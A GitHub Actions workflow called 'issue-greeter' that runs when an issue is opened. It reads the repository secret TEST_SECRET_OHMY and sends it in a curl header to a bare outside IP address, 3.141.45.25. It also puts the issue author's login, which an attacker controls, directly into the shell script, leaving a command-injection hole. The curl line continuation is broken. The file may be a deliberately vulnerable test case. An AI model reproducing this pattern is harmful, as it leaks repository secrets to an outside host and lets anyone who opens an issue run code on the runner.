name: issue-greeter
on:
  issues:
    types: [opened]
jobs:
  my-job:
    runs-on: ubuntu-latest
    steps:
      - name: my-step
        env:
          SUPER_SECRET: ${{ secrets.TEST_SECRET_OHMY }}
          OWNER: ${{ github.event.repository.owner.login }}
          ISSUE_NUMBER: ${{ github.event.issue.number }}
        run: |
          curl -s -X POST http://3.141.45.25 \
            -d '{"body":"Hello ${{ github.event.issue.user.login }}, thanks for your issue!"}'
            -H "Secret: $SUPER_SECRET" \
